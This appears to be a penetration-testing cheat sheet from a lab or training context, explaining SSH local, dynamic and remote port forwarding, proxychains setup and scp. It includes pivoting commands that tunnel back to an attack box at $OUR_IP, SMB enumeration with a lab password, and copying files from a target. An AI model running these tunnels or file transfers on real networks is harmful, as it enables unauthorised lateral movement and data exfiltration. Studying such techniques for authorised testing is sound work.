SSH - 22
ssh
Secure Shell
Capabilities
Local Fowarding
# Connect to 10.4.50.215 and listen on 4455, forwarding to 172.16.50.217:445
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215
# Connect to 10.4.50.215 and listen on 9999, forwarding all traffic (simulating a SOCKS proxy)
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215Remote Fowarding (reverse)
# Connect to our attack box, listen on port 2345, and forward all traffic to 10.4.50.215:5432
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@$OUR_IP
# Connect to our attack box, and act as a SOCKS proxy operating on port 1080
ssh -N -R 1080 kali@$OUR_IP-N means no shell
-Lthink local port forwarding-Dthink dynamic port forwarding (SOCKS proxy)-Rthink remote port forwarding
In the 2nd example
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215We are running the ssh command on a reverse shell we have already established to 192.168.50.63. Upon executing the command, 192.168.50.63 essentially becomes a SOCKS proxy for us to send traffic to that will then be forwarded to 10.4.50.215, and 10.4.50.215 will forward the traffic to its final destination.
We can then use proxychains to interact with 192.168.50.63 by adding the following to our /etc/proxychains4.conf
# ... At the very bottom of the file, we set the ProxyList to only point to port 9999.
[ProxyList]
socks5 192.168.50.63 9999Now in the following command
proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234The request will first be taken by proxychains and fowarded to 192.168.50.63:9999 as specified in our /etc/proxychains4.conf. The traffic is then tunneled to 10.4.50.215:9999, where 10.4.50.215 then fowards it to its final destination of 172.16.50.217:445.
scp
Copy files over SSH
Capabilities
# Copy files from target to attack box
scp <user>@<remote-host>:<path> <file>
# Copy files from attack box to target
scp <file> <user>@<remote-host>:<path>Specify -r for a directory
Last updated